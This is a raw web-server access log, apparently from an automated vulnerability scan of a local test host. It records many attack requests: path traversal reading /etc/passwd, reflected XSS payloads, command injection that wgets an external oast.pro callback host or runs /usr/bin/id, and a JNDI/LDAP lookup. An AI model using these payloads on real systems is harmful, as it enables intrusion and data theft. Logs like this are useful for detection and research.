AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://interact.sh/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/printenv.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nagios3/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backupmgt/localJob.php?session=fail;wget http://ca28bc0smpvbbtig07h0bjsn99wt7qg4z.oast.pro; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.234","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_3/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22read\x22,\x0D\x0A \x22mbean\x22:\x22java.lang:type=Memory\x22,\x0D\x0A \x22target\x22:{\x0D\x0A \x22url\x22:\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/read/getDiagnosticOptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22livechat:loadHistory\x5C\x22,\x5C\x22params\x5C\x22:[{\x5C\x22token\x5C\x22:\x5C\x22cvenucleirocketchat\x5C\x22,\x5C\x22rid\x5C\x22:\x5C\x22GENERAL\x5C\x22}],\x5C\x22msg\x5C\x22:\x5C\x22123\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/cve_exploit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"getpwd=WorldFilledWithLove","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer/send_email?to=wjFD@TeuN&url=http://ca28bc0smpvbbtig07h09c1z3qquupdgx.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/sdk/rest/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", 